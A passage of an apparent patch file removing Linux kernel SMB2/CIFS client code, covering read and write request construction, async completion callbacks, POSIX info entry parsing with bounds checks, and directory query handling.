+-		if (request_type & RELATED_REQUEST) {
+-			shdr->Flags |= SMB2_FLAGS_RELATED_OPERATIONS;
+-			/*
+-			 * Related requests use info from previous read request
+-			 * in chain.
+-			 */
+-			shdr->SessionId = cpu_to_le64(0xFFFFFFFFFFFFFFFF);
+-			shdr->Id.SyncId.TreeId = cpu_to_le32(0xFFFFFFFF);
+-			req->PersistentFileId = (u64)-1;
+-			req->VolatileFileId = (u64)-1;
+-		}
+-	}
+-	if (remaining_bytes > io_parms->length)
+-		req->RemainingBytes = cpu_to_le32(remaining_bytes);
+-	else
+-		req->RemainingBytes = 0;
+-
+-	*buf = req;
+-	return rc;
+-}
+-
+-static void
+-smb2_readv_callback(struct mid_q_entry *mid)
+-{
+-	struct cifs_readdata *rdata = mid->callback_data;
+-	struct cifs_tcon *tcon = tlink_tcon(rdata->cfile->tlink);
+-	struct TCP_Server_Info *server = rdata->server;
+-	struct smb2_hdr *shdr =
+-				(struct smb2_hdr *)rdata->iov[0].iov_base;
+-	struct cifs_credits credits = { .value = 0, .instance = 0 };
+-	struct smb_rqst rqst = { .rq_iov = &rdata->iov[1],
+-				 .rq_nvec = 1, };
+-
+-	if (rdata->got_bytes) {
+-		rqst.rq_pages = rdata->pages;
+-		rqst.rq_offset = rdata->page_offset;
+-		rqst.rq_npages = rdata->nr_pages;
+-		rqst.rq_pagesz = rdata->pagesz;
+-		rqst.rq_tailsz = rdata->tailsz;
+-	}
+-
+-	WARN_ONCE(rdata->server != mid->server,
+-		  "rdata server %p != mid server %p",
+-		  rdata->server, mid->server);
+-
+-	cifs_dbg(FYI, "%s: mid=%llu state=%d result=%d bytes=%u\n",
+-		 __func__, mid->mid, mid->mid_state, rdata->result,
+-		 rdata->bytes);
+-
+-	switch (mid->mid_state) {
+-	case MID_RESPONSE_RECEIVED:
+-		credits.value = le16_to_cpu(shdr->CreditRequest);
+-		credits.instance = server->reconnect_instance;
+-		/* result already set, check signature */
+-		if (server->sign && !mid->decrypted) {
+-			int rc;
+-
+-			rc = smb2_verify_signature(&rqst, server);
+-			if (rc)
+-				cifs_tcon_dbg(VFS, "SMB signature verification returned error = %d\n",
+-					 rc);
+-		}
+-		/* FIXME: should this be counted toward the initiating task? */
+-		task_io_account_read(rdata->got_bytes);
+-		cifs_stats_bytes_read(tcon, rdata->got_bytes);
+-		break;
+-	case MID_REQUEST_SUBMITTED:
+-	case MID_RETRY_NEEDED:
+-		rdata->result = -EAGAIN;
+-		if (server->sign && rdata->got_bytes)
+-			/* reset bytes number since we can not check a sign */
+-			rdata->got_bytes = 0;
+-		/* FIXME: should this be counted toward the initiating task? */
+-		task_io_account_read(rdata->got_bytes);
+-		cifs_stats_bytes_read(tcon, rdata->got_bytes);
+-		break;
+-	case MID_RESPONSE_MALFORMED:
+-		credits.value = le16_to_cpu(shdr->CreditRequest);
+-		credits.instance = server->reconnect_instance;
+-		fallthrough;
+-	default:
+-		rdata->result = -EIO;
+-	}
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-	/*
+-	 * If this rdata has a memmory registered, the MR can be freed
+-	 * MR needs to be freed as soon as I/O finishes to prevent deadlock
+-	 * because they have limited number and are used for future I/Os
+-	 */
+-	if (rdata->mr) {
+-		smbd_deregister_mr(rdata->mr);
+-		rdata->mr = NULL;
+-	}
+-#endif
+-	if (rdata->result && rdata->result != -ENODATA) {
+-		cifs_stats_fail_inc(tcon, SMB2_READ_HE);
+-		trace_smb3_read_err(0 /* xid */,
+-				    rdata->cfile->fid.persistent_fid,
+-				    tcon->tid, tcon->ses->Suid, rdata->offset,
+-				    rdata->bytes, rdata->result);
+-	} else
+-		trace_smb3_read_done(0 /* xid */,
+-				     rdata->cfile->fid.persistent_fid,
+-				     tcon->tid, tcon->ses->Suid,
+-				     rdata->offset, rdata->got_bytes);
+-
+-	queue_work(cifsiod_wq, &rdata->work);
+-	release_mid(mid);
+-	add_credits(server, &credits, 0);
+-}
+-
+-/* smb2_async_readv - send an async read, and set up mid to handle result */
+-int
+-smb2_async_readv(struct cifs_readdata *rdata)
+-{
+-	int rc, flags = 0;
+-	char *buf;
+-	struct smb2_hdr *shdr;
+-	struct cifs_io_parms io_parms;
+-	struct smb_rqst rqst = { .rq_iov = rdata->iov,
+-				 .rq_nvec = 1 };
+-	struct TCP_Server_Info *server;
+-	struct cifs_tcon *tcon = tlink_tcon(rdata->cfile->tlink);
+-	unsigned int total_len;
+-
+-	cifs_dbg(FYI, "%s: offset=%llu bytes=%u\n",
+-		 __func__, rdata->offset, rdata->bytes);
+-
+-	if (!rdata->server)
+-		rdata->server = cifs_pick_channel(tcon->ses);
+-
+-	io_parms.tcon = tlink_tcon(rdata->cfile->tlink);
+-	io_parms.server = server = rdata->server;
+-	io_parms.offset = rdata->offset;
+-	io_parms.length = rdata->bytes;
+-	io_parms.persistent_fid = rdata->cfile->fid.persistent_fid;
+-	io_parms.volatile_fid = rdata->cfile->fid.volatile_fid;
+-	io_parms.pid = rdata->pid;
+-
+-	rc = smb2_new_read_req(
+-		(void **) &buf, &total_len, &io_parms, rdata, 0, 0);
+-	if (rc)
+-		return rc;
+-
+-	if (smb3_encryption_required(io_parms.tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	rdata->iov[0].iov_base = buf;
+-	rdata->iov[0].iov_len = total_len;
+-
+-	shdr = (struct smb2_hdr *)buf;
+-
+-	if (rdata->credits.value > 0) {
+-		shdr->CreditCharge = cpu_to_le16(DIV_ROUND_UP(rdata->bytes,
+-						SMB2_MAX_BUFFER_SIZE));
+-		shdr->CreditRequest = cpu_to_le16(le16_to_cpu(shdr->CreditCharge) + 8);
+-
+-		rc = adjust_credits(server, &rdata->credits, rdata->bytes);
+-		if (rc)
+-			goto async_readv_out;
+-
+-		flags |= CIFS_HAS_CREDITS;
+-	}
+-
+-	kref_get(&rdata->refcount);
+-	rc = cifs_call_async(server, &rqst,
+-			     cifs_readv_receive, smb2_readv_callback,
+-			     smb3_handle_read_data, rdata, flags,
+-			     &rdata->credits);
+-	if (rc) {
+-		kref_put(&rdata->refcount, cifs_readdata_release);
+-		cifs_stats_fail_inc(io_parms.tcon, SMB2_READ_HE);
+-		trace_smb3_read_err(0 /* xid */, io_parms.persistent_fid,
+-				    io_parms.tcon->tid,
+-				    io_parms.tcon->ses->Suid,
+-				    io_parms.offset, io_parms.length, rc);
+-	}
+-
+-async_readv_out:
+-	cifs_small_buf_release(buf);
+-	return rc;
+-}
+-
+-int
+-SMB2_read(const unsigned int xid, struct cifs_io_parms *io_parms,
+-	  unsigned int *nbytes, char **buf, int *buf_type)
+-{
+-	struct smb_rqst rqst;
+-	int resp_buftype, rc;
+-	struct smb2_read_req *req = NULL;
+-	struct smb2_read_rsp *rsp = NULL;
+-	struct kvec iov[1];
+-	struct kvec rsp_iov;
+-	unsigned int total_len;
+-	int flags = CIFS_LOG_ERROR;
+-	struct cifs_ses *ses = io_parms->tcon->ses;
+-
+-	if (!io_parms->server)
+-		io_parms->server = cifs_pick_channel(io_parms->tcon->ses);
+-
+-	*nbytes = 0;
+-	rc = smb2_new_read_req((void **)&req, &total_len, io_parms, NULL, 0, 0);
+-	if (rc)
+-		return rc;
+-
+-	if (smb3_encryption_required(io_parms->tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	iov[0].iov_base = (char *)req;
+-	iov[0].iov_len = total_len;
+-
+-	memset(&rqst, 0, sizeof(struct smb_rqst));
+-	rqst.rq_iov = iov;
+-	rqst.rq_nvec = 1;
+-
+-	rc = cifs_send_recv(xid, ses, io_parms->server,
+-			    &rqst, &resp_buftype, flags, &rsp_iov);
+-	rsp = (struct smb2_read_rsp *)rsp_iov.iov_base;
+-
+-	if (rc) {
+-		if (rc != -ENODATA) {
+-			cifs_stats_fail_inc(io_parms->tcon, SMB2_READ_HE);
+-			cifs_dbg(VFS, "Send error in read = %d\n", rc);
+-			trace_smb3_read_err(xid,
+-					    req->PersistentFileId,
+-					    io_parms->tcon->tid, ses->Suid,
+-					    io_parms->offset, io_parms->length,
+-					    rc);
+-		} else
+-			trace_smb3_read_done(xid, req->PersistentFileId, io_parms->tcon->tid,
+-					     ses->Suid, io_parms->offset, 0);
+-		free_rsp_buf(resp_buftype, rsp_iov.iov_base);
+-		cifs_small_buf_release(req);
+-		return rc == -ENODATA ? 0 : rc;
+-	} else
+-		trace_smb3_read_done(xid,
+-				    req->PersistentFileId,
+-				    io_parms->tcon->tid, ses->Suid,
+-				    io_parms->offset, io_parms->length);
+-
+-	cifs_small_buf_release(req);
+-
+-	*nbytes = le32_to_cpu(rsp->DataLength);
+-	if ((*nbytes > CIFS_MAX_MSGSIZE) ||
+-	    (*nbytes > io_parms->length)) {
+-		cifs_dbg(FYI, "bad length %d for count %d\n",
+-			 *nbytes, io_parms->length);
+-		rc = -EIO;
+-		*nbytes = 0;
+-	}
+-
+-	if (*buf) {
+-		memcpy(*buf, (char *)rsp + rsp->DataOffset, *nbytes);
+-		free_rsp_buf(resp_buftype, rsp_iov.iov_base);
+-	} else if (resp_buftype != CIFS_NO_BUFFER) {
+-		*buf = rsp_iov.iov_base;
+-		if (resp_buftype == CIFS_SMALL_BUFFER)
+-			*buf_type = CIFS_SMALL_BUFFER;
+-		else if (resp_buftype == CIFS_LARGE_BUFFER)
+-			*buf_type = CIFS_LARGE_BUFFER;
+-	}
+-	return rc;
+-}
+-
+-/*
+- * Check the mid_state and signature on received buffer (if any), and queue the
+- * workqueue completion task.
+- */
+-static void
+-smb2_writev_callback(struct mid_q_entry *mid)
+-{
+-	struct cifs_writedata *wdata = mid->callback_data;
+-	struct cifs_tcon *tcon = tlink_tcon(wdata->cfile->tlink);
+-	struct TCP_Server_Info *server = wdata->server;
+-	unsigned int written;
+-	struct smb2_write_rsp *rsp = (struct smb2_write_rsp *)mid->resp_buf;
+-	struct cifs_credits credits = { .value = 0, .instance = 0 };
+-
+-	WARN_ONCE(wdata->server != mid->server,
+-		  "wdata server %p != mid server %p",
+-		  wdata->server, mid->server);
+-
+-	switch (mid->mid_state) {
+-	case MID_RESPONSE_RECEIVED:
+-		credits.value = le16_to_cpu(rsp->hdr.CreditRequest);
+-		credits.instance = server->reconnect_instance;
+-		wdata->result = smb2_check_receive(mid, server, 0);
+-		if (wdata->result != 0)
+-			break;
+-
+-		written = le32_to_cpu(rsp->DataLength);
+-		/*
+-		 * Mask off high 16 bits when bytes written as returned
+-		 * by the server is greater than bytes requested by the
+-		 * client. OS/2 servers are known to set incorrect
+-		 * CountHigh values.
+-		 */
+-		if (written > wdata->bytes)
+-			written &= 0xFFFF;
+-
+-		if (written < wdata->bytes)
+-			wdata->result = -ENOSPC;
+-		else
+-			wdata->bytes = written;
+-		break;
+-	case MID_REQUEST_SUBMITTED:
+-	case MID_RETRY_NEEDED:
+-		wdata->result = -EAGAIN;
+-		break;
+-	case MID_RESPONSE_MALFORMED:
+-		credits.value = le16_to_cpu(rsp->hdr.CreditRequest);
+-		credits.instance = server->reconnect_instance;
+-		fallthrough;
+-	default:
+-		wdata->result = -EIO;
+-		break;
+-	}
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-	/*
+-	 * If this wdata has a memory registered, the MR can be freed
+-	 * The number of MRs available is limited, it's important to recover
+-	 * used MR as soon as I/O is finished. Hold MR longer in the later
+-	 * I/O process can possibly result in I/O deadlock due to lack of MR
+-	 * to send request on I/O retry
+-	 */
+-	if (wdata->mr) {
+-		smbd_deregister_mr(wdata->mr);
+-		wdata->mr = NULL;
+-	}
+-#endif
+-	if (wdata->result) {
+-		cifs_stats_fail_inc(tcon, SMB2_WRITE_HE);
+-		trace_smb3_write_err(0 /* no xid */,
+-				     wdata->cfile->fid.persistent_fid,
+-				     tcon->tid, tcon->ses->Suid, wdata->offset,
+-				     wdata->bytes, wdata->result);
+-		if (wdata->result == -ENOSPC)
+-			pr_warn_once("Out of space writing to %s\n",
+-				     tcon->tree_name);
+-	} else
+-		trace_smb3_write_done(0 /* no xid */,
+-				      wdata->cfile->fid.persistent_fid,
+-				      tcon->tid, tcon->ses->Suid,
+-				      wdata->offset, wdata->bytes);
+-
+-	queue_work(cifsiod_wq, &wdata->work);
+-	release_mid(mid);
+-	add_credits(server, &credits, 0);
+-}
+-
+-/* smb2_async_writev - send an async write, and set up mid to handle result */
+-int
+-smb2_async_writev(struct cifs_writedata *wdata,
+-		  void (*release)(struct kref *kref))
+-{
+-	int rc = -EACCES, flags = 0;
+-	struct smb2_write_req *req = NULL;
+-	struct smb2_hdr *shdr;
+-	struct cifs_tcon *tcon = tlink_tcon(wdata->cfile->tlink);
+-	struct TCP_Server_Info *server = wdata->server;
+-	struct kvec iov[1];
+-	struct smb_rqst rqst = { };
+-	unsigned int total_len;
+-	struct cifs_io_parms _io_parms;
+-	struct cifs_io_parms *io_parms = NULL;
+-
+-	if (!wdata->server)
+-		server = wdata->server = cifs_pick_channel(tcon->ses);
+-
+-	/*
+-	 * in future we may get cifs_io_parms passed in from the caller,
+-	 * but for now we construct it here...
+-	 */
+-	_io_parms = (struct cifs_io_parms) {
+-		.tcon = tcon,
+-		.server = server,
+-		.offset = wdata->offset,
+-		.length = wdata->bytes,
+-		.persistent_fid = wdata->cfile->fid.persistent_fid,
+-		.volatile_fid = wdata->cfile->fid.volatile_fid,
+-		.pid = wdata->pid,
+-	};
+-	io_parms = &_io_parms;
+-
+-	rc = smb2_plain_req_init(SMB2_WRITE, tcon, server,
+-				 (void **) &req, &total_len);
+-	if (rc)
+-		return rc;
+-
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	shdr = (struct smb2_hdr *)req;
+-	shdr->Id.SyncId.ProcessId = cpu_to_le32(io_parms->pid);
+-
+-	req->PersistentFileId = io_parms->persistent_fid;
+-	req->VolatileFileId = io_parms->volatile_fid;
+-	req->WriteChannelInfoOffset = 0;
+-	req->WriteChannelInfoLength = 0;
+-	req->Channel = 0;
+-	req->Offset = cpu_to_le64(io_parms->offset);
+-	req->DataOffset = cpu_to_le16(
+-				offsetof(struct smb2_write_req, Buffer));
+-	req->RemainingBytes = 0;
+-
+-	trace_smb3_write_enter(0 /* xid */,
+-			       io_parms->persistent_fid,
+-			       io_parms->tcon->tid,
+-			       io_parms->tcon->ses->Suid,
+-			       io_parms->offset,
+-			       io_parms->length);
+-
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-	/*
+-	 * If we want to do a server RDMA read, fill in and append
+-	 * smbd_buffer_descriptor_v1 to the end of write request
+-	 */
+-	if (smb3_use_rdma_offload(io_parms)) {
+-		struct smbd_buffer_descriptor_v1 *v1;
+-		bool need_invalidate = server->dialect == SMB30_PROT_ID;
+-
+-		wdata->mr = smbd_register_mr(
+-				server->smbd_conn, wdata->pages,
+-				wdata->nr_pages, wdata->page_offset,
+-				wdata->tailsz, false, need_invalidate);
+-		if (!wdata->mr) {
+-			rc = -EAGAIN;
+-			goto async_writev_out;
+-		}
+-		req->Length = 0;
+-		req->DataOffset = 0;
+-		if (wdata->nr_pages > 1)
+-			req->RemainingBytes =
+-				cpu_to_le32(
+-					(wdata->nr_pages - 1) * wdata->pagesz -
+-					wdata->page_offset + wdata->tailsz
+-				);
+-		else
+-			req->RemainingBytes = cpu_to_le32(wdata->tailsz);
+-		req->Channel = SMB2_CHANNEL_RDMA_V1_INVALIDATE;
+-		if (need_invalidate)
+-			req->Channel = SMB2_CHANNEL_RDMA_V1;
+-		req->WriteChannelInfoOffset =
+-			cpu_to_le16(offsetof(struct smb2_write_req, Buffer));
+-		req->WriteChannelInfoLength =
+-			cpu_to_le16(sizeof(struct smbd_buffer_descriptor_v1));
+-		v1 = (struct smbd_buffer_descriptor_v1 *) &req->Buffer[0];
+-		v1->offset = cpu_to_le64(wdata->mr->mr->iova);
+-		v1->token = cpu_to_le32(wdata->mr->mr->rkey);
+-		v1->length = cpu_to_le32(wdata->mr->mr->length);
+-	}
+-#endif
+-	iov[0].iov_len = total_len - 1;
+-	iov[0].iov_base = (char *)req;
+-
+-	rqst.rq_iov = iov;
+-	rqst.rq_nvec = 1;
+-	rqst.rq_pages = wdata->pages;
+-	rqst.rq_offset = wdata->page_offset;
+-	rqst.rq_npages = wdata->nr_pages;
+-	rqst.rq_pagesz = wdata->pagesz;
+-	rqst.rq_tailsz = wdata->tailsz;
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-	if (wdata->mr) {
+-		iov[0].iov_len += sizeof(struct smbd_buffer_descriptor_v1);
+-		rqst.rq_npages = 0;
+-	}
+-#endif
+-	cifs_dbg(FYI, "async write at %llu %u bytes\n",
+-		 io_parms->offset, io_parms->length);
+-
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-	/* For RDMA read, I/O size is in RemainingBytes not in Length */
+-	if (!wdata->mr)
+-		req->Length = cpu_to_le32(io_parms->length);
+-#else
+-	req->Length = cpu_to_le32(io_parms->length);
+-#endif
+-
+-	if (wdata->credits.value > 0) {
+-		shdr->CreditCharge = cpu_to_le16(DIV_ROUND_UP(wdata->bytes,
+-						    SMB2_MAX_BUFFER_SIZE));
+-		shdr->CreditRequest = cpu_to_le16(le16_to_cpu(shdr->CreditCharge) + 8);
+-
+-		rc = adjust_credits(server, &wdata->credits, io_parms->length);
+-		if (rc)
+-			goto async_writev_out;
+-
+-		flags |= CIFS_HAS_CREDITS;
+-	}
+-
+-	kref_get(&wdata->refcount);
+-	rc = cifs_call_async(server, &rqst, NULL, smb2_writev_callback, NULL,
+-			     wdata, flags, &wdata->credits);
+-
+-	if (rc) {
+-		trace_smb3_write_err(0 /* no xid */,
+-				     io_parms->persistent_fid,
+-				     io_parms->tcon->tid,
+-				     io_parms->tcon->ses->Suid,
+-				     io_parms->offset,
+-				     io_parms->length,
+-				     rc);
+-		kref_put(&wdata->refcount, release);
+-		cifs_stats_fail_inc(tcon, SMB2_WRITE_HE);
+-	}
+-
+-async_writev_out:
+-	cifs_small_buf_release(req);
+-	return rc;
+-}
+-
+-/*
+- * SMB2_write function gets iov pointer to kvec array with n_vec as a length.
+- * The length field from io_parms must be at least 1 and indicates a number of
+- * elements with data to write that begins with position 1 in iov array. All
+- * data length is specified by count.
+- */
+-int
+-SMB2_write(const unsigned int xid, struct cifs_io_parms *io_parms,
+-	   unsigned int *nbytes, struct kvec *iov, int n_vec)
+-{
+-	struct smb_rqst rqst;
+-	int rc = 0;
+-	struct smb2_write_req *req = NULL;
+-	struct smb2_write_rsp *rsp = NULL;
+-	int resp_buftype;
+-	struct kvec rsp_iov;
+-	int flags = 0;
+-	unsigned int total_len;
+-	struct TCP_Server_Info *server;
+-
+-	*nbytes = 0;
+-
+-	if (n_vec < 1)
+-		return rc;
+-
+-	if (!io_parms->server)
+-		io_parms->server = cifs_pick_channel(io_parms->tcon->ses);
+-	server = io_parms->server;
+-	if (server == NULL)
+-		return -ECONNABORTED;
+-
+-	rc = smb2_plain_req_init(SMB2_WRITE, io_parms->tcon, server,
+-				 (void **) &req, &total_len);
+-	if (rc)
+-		return rc;
+-
+-	if (smb3_encryption_required(io_parms->tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	req->hdr.Id.SyncId.ProcessId = cpu_to_le32(io_parms->pid);
+-
+-	req->PersistentFileId = io_parms->persistent_fid;
+-	req->VolatileFileId = io_parms->volatile_fid;
+-	req->WriteChannelInfoOffset = 0;
+-	req->WriteChannelInfoLength = 0;
+-	req->Channel = 0;
+-	req->Length = cpu_to_le32(io_parms->length);
+-	req->Offset = cpu_to_le64(io_parms->offset);
+-	req->DataOffset = cpu_to_le16(
+-				offsetof(struct smb2_write_req, Buffer));
+-	req->RemainingBytes = 0;
+-
+-	trace_smb3_write_enter(xid, io_parms->persistent_fid,
+-		io_parms->tcon->tid, io_parms->tcon->ses->Suid,
+-		io_parms->offset, io_parms->length);
+-
+-	iov[0].iov_base = (char *)req;
+-	/* 1 for Buffer */
+-	iov[0].iov_len = total_len - 1;
+-
+-	memset(&rqst, 0, sizeof(struct smb_rqst));
+-	rqst.rq_iov = iov;
+-	rqst.rq_nvec = n_vec + 1;
+-
+-	rc = cifs_send_recv(xid, io_parms->tcon->ses, server,
+-			    &rqst,
+-			    &resp_buftype, flags, &rsp_iov);
+-	rsp = (struct smb2_write_rsp *)rsp_iov.iov_base;
+-
+-	if (rc) {
+-		trace_smb3_write_err(xid,
+-				     req->PersistentFileId,
+-				     io_parms->tcon->tid,
+-				     io_parms->tcon->ses->Suid,
+-				     io_parms->offset, io_parms->length, rc);
+-		cifs_stats_fail_inc(io_parms->tcon, SMB2_WRITE_HE);
+-		cifs_dbg(VFS, "Send error in write = %d\n", rc);
+-	} else {
+-		*nbytes = le32_to_cpu(rsp->DataLength);
+-		trace_smb3_write_done(xid,
+-				      req->PersistentFileId,
+-				      io_parms->tcon->tid,
+-				      io_parms->tcon->ses->Suid,
+-				      io_parms->offset, *nbytes);
+-	}
+-
+-	cifs_small_buf_release(req);
+-	free_rsp_buf(resp_buftype, rsp);
+-	return rc;
+-}
+-
+-int posix_info_sid_size(const void *beg, const void *end)
+-{
+-	size_t subauth;
+-	int total;
+-
+-	if (beg + 1 > end)
+-		return -1;
+-
+-	subauth = *(u8 *)(beg+1);
+-	if (subauth < 1 || subauth > 15)
+-		return -1;
+-
+-	total = 1 + 1 + 6 + 4*subauth;
+-	if (beg + total > end)
+-		return -1;
+-
+-	return total;
+-}
+-
+-int posix_info_parse(const void *beg, const void *end,
+-		     struct smb2_posix_info_parsed *out)
+-
+-{
+-	int total_len = 0;
+-	int owner_len, group_len;
+-	int name_len;
+-	const void *owner_sid;
+-	const void *group_sid;
+-	const void *name;
+-
+-	/* if no end bound given, assume payload to be correct */
+-	if (!end) {
+-		const struct smb2_posix_info *p = beg;
+-
+-		end = beg + le32_to_cpu(p->NextEntryOffset);
+-		/* last element will have a 0 offset, pick a sensible bound */
+-		if (end == beg)
+-			end += 0xFFFF;
+-	}
+-
+-	/* check base buf */
+-	if (beg + sizeof(struct smb2_posix_info) > end)
+-		return -1;
+-	total_len = sizeof(struct smb2_posix_info);
+-
+-	/* check owner sid */
+-	owner_sid = beg + total_len;
+-	owner_len = posix_info_sid_size(owner_sid, end);
+-	if (owner_len < 0)
+-		return -1;
+-	total_len += owner_len;
+-
+-	/* check group sid */
+-	group_sid = beg + total_len;
+-	group_len = posix_info_sid_size(group_sid, end);
+-	if (group_len < 0)
+-		return -1;
+-	total_len += group_len;
+-
+-	/* check name len */
+-	if (beg + total_len + 4 > end)
+-		return -1;
+-	name_len = le32_to_cpu(*(__le32 *)(beg + total_len));
+-	if (name_len < 1 || name_len > 0xFFFF)
+-		return -1;
+-	total_len += 4;
+-
+-	/* check name */
+-	name = beg + total_len;
+-	if (name + name_len > end)
+-		return -1;
+-	total_len += name_len;
+-
+-	if (out) {
+-		out->base = beg;
+-		out->size = total_len;
+-		out->name_len = name_len;
+-		out->name = name;
+-		memcpy(&out->owner, owner_sid, owner_len);
+-		memcpy(&out->group, group_sid, group_len);
+-	}
+-	return total_len;
+-}
+-
+-static int posix_info_extra_size(const void *beg, const void *end)
+-{
+-	int len = posix_info_parse(beg, end, NULL);
+-
+-	if (len < 0)
+-		return -1;
+-	return len - sizeof(struct smb2_posix_info);
+-}
+-
+-static unsigned int
+-num_entries(int infotype, char *bufstart, char *end_of_buf, char **lastentry,
+-	    size_t size)
+-{
+-	int len;
+-	unsigned int entrycount = 0;
+-	unsigned int next_offset = 0;
+-	char *entryptr;
+-	FILE_DIRECTORY_INFO *dir_info;
+-
+-	if (bufstart == NULL)
+-		return 0;
+-
+-	entryptr = bufstart;
+-
+-	while (1) {
+-		if (entryptr + next_offset < entryptr ||
+-		    entryptr + next_offset > end_of_buf ||
+-		    entryptr + next_offset + size > end_of_buf) {
+-			cifs_dbg(VFS, "malformed search entry would overflow\n");
+-			break;
+-		}
+-
+-		entryptr = entryptr + next_offset;
+-		dir_info = (FILE_DIRECTORY_INFO *)entryptr;
+-
+-		if (infotype == SMB_FIND_FILE_POSIX_INFO)
+-			len = posix_info_extra_size(entryptr, end_of_buf);
+-		else
+-			len = le32_to_cpu(dir_info->FileNameLength);
+-
+-		if (len < 0 ||
+-		    entryptr + len < entryptr ||
+-		    entryptr + len > end_of_buf ||
+-		    entryptr + len + size > end_of_buf) {
+-			cifs_dbg(VFS, "directory entry name would overflow frame end of buf %p\n",
+-				 end_of_buf);
+-			break;
+-		}
+-
+-		*lastentry = entryptr;
+-		entrycount++;
+-
+-		next_offset = le32_to_cpu(dir_info->NextEntryOffset);
+-		if (!next_offset)
+-			break;
+-	}
+-
+-	return entrycount;
+-}
+-
+-/*
+- * Readdir/FindFirst
+- */
+-int SMB2_query_directory_init(const unsigned int xid,
+-			      struct cifs_tcon *tcon,
+-			      struct TCP_Server_Info *server,
+-			      struct smb_rqst *rqst,
+-			      u64 persistent_fid, u64 volatile_fid,
+-			      int index, int info_level)
+-{
+-	struct smb2_query_directory_req *req;
+-	unsigned char *bufptr;
+-	__le16 asteriks = cpu_to_le16('*');
+-	unsigned int output_size = CIFSMaxBufSize -
+-		MAX_SMB2_CREATE_RESPONSE_SIZE -
+-		MAX_SMB2_CLOSE_RESPONSE_SIZE;
+-	unsigned int total_len;
+-	struct kvec *iov = rqst->rq_iov;
+-	int len, rc;
+-
+-	rc = smb2_plain_req_init(SMB2_QUERY_DIRECTORY, tcon, server,
+-				 (void **) &req, &total_len);
+-	if (rc)
+-		return rc;
+-
+-	switch (info_level) {
+-	case SMB_FIND_FILE_DIRECTORY_INFO:
+-		req->FileInformationClass = FILE_DIRECTORY_INFORMATION;
+-		break;
+-	case SMB_FIND_FILE_ID_FULL_DIR_INFO:
+-		req->FileInformationClass = FILEID_FULL_DIRECTORY_INFORMATION;
+-		break;
+-	case SMB_FIND_FILE_POSIX_INFO:
+-		req->FileInformationClass = SMB_FIND_FILE_POSIX_INFO;
+-		break;
+-	default:
+-		cifs_tcon_dbg(VFS, "info level %u isn't supported\n",
+-			info_level);
+-		return -EINVAL;
+-	}
+-
+-	req->FileIndex = cpu_to_le32(index);
+-	req->PersistentFileId = persistent_fid;
+-	req->VolatileFileId = volatile_fid;
+-
+-	len = 0x2;
+-	bufptr = req->Buffer;
+-	memcpy(bufptr, &asteriks, len);
+-
+-	req->FileNameOffset =
+-		cpu_to_le16(sizeof(struct smb2_query_directory_req) - 1);
+-	req->FileNameLength = cpu_to_le16(len);
+-	/*
+-	 * BB could be 30 bytes or so longer if we used SMB2 specific
+-	 * buffer lengths, but this is safe and close enough.
+-	 */
+-	output_size = min_t(unsigned int, output_size, server->maxBuf);
+-	output_size = min_t(unsigned int, output_size, 2 << 15);
+-	req->OutputBufferLength = cpu_to_le32(output_size);
+-
+-	iov[0].iov_base = (char *)req;
+-	/* 1 for Buffer */
+-	iov[0].iov_len = total_len - 1;
+-
+-	iov[1].iov_base = (char *)(req->Buffer);
+-	iov[1].iov_len = len;
+-
+-	trace_smb3_query_dir_enter(xid, persistent_fid, tcon->tid,
+-			tcon->ses->Suid, index, output_size);
+-
+-	return 0;
+-}
+-
+-void SMB2_query_directory_free(struct smb_rqst *rqst)
+-{
+-	if (rqst && rqst->rq_iov) {
+-		cifs_small_buf_release(rqst->rq_iov[0].iov_base); /* request */
+-	}
+-}
+-
+-int
+-smb2_parse_query_directory(struct cifs_tcon *tcon,
+-			   struct kvec *rsp_iov,
+-			   int resp_buftype,
+-			   struct cifs_search_info *srch_inf)
+-{
+-	struct smb2_query_directory_rsp *rsp;
+-	size_t info_buf_size;
+-	char *end_of_smb;
+-	int rc;
+-
+-	rsp = (struct smb2_query_directory_rsp *)rsp_iov->iov_base;
+-
+-	switch (srch_inf->info_level) {
+-	case SMB_FIND_FILE_DIRECTORY_INFO:
+-		info_buf_size = sizeof(FILE_DIRECTORY_INFO) - 1;
+-		break;
+-	case SMB_FIND_FILE_ID_FULL_DIR_INFO:
+-		info_buf_size = sizeof(SEARCH_ID_FULL_DIR_INFO) - 1;
+-		break;
+-	case SMB_FIND_FILE_POSIX_INFO:
+-		/* note that posix payload are variable size */
+-		info_buf_size = sizeof(struct smb2_posix_info);
+-		break;
+-	default:
+-		cifs_tcon_dbg(VFS, "info level %u isn't supported\n",
+-			 srch_inf->info_level);
+-		return -EINVAL;
+-	}
+-
+-	rc = smb2_validate_iov(le16_to_cpu(rsp->OutputBufferOffset),
+-			       le32_to_cpu(rsp->OutputBufferLength), rsp_iov,
+-			       info_buf_size);
+-	if (rc) {
+-		cifs_tcon_dbg(VFS, "bad info payload");
+-		return rc;
+-	}
+-
+-	srch_inf->unicode = true;
+-
+-	if (srch_inf->ntwrk_buf_start) {
+-		if (srch_inf->smallBuf)
+-			cifs_small_buf_release(srch_inf->ntwrk_buf_start);
+-		else
+-			cifs_buf_release(srch_inf->ntwrk_buf_start);
+-	}
+-	srch_inf->ntwrk_buf_start = (char *)rsp;
+-	srch_inf->srch_entries_start = srch_inf->last_entry =
+-		(char *)rsp + le16_to_cpu(rsp->OutputBufferOffset);
+-	end_of_smb = rsp_iov->iov_len + (char *)rsp;
+-
+-	srch_inf->entries_in_buffer = num_entries(
+-		srch_inf->info_level,
+-		srch_inf->srch_entries_start,
+-		end_of_smb,
+-		&srch_inf->last_entry,
+-		info_buf_size);
+-
+-	srch_inf->index_of_last_entry += srch_inf->entries_in_buffer;
+-	cifs_dbg(FYI, "num entries %d last_index %lld srch start %p srch end %p\n",
+-		 srch_inf->entries_in_buffer, srch_inf->index_of_last_entry,
+-		 srch_inf->srch_entries_start, srch_inf->last_entry);
+-	if (resp_buftype == CIFS_LARGE_BUFFER)
+-		srch_inf->smallBuf = false;
+-	else if (resp_buftype == CIFS_SMALL_BUFFER)
+-		srch_inf->smallBuf = true;
+-	else
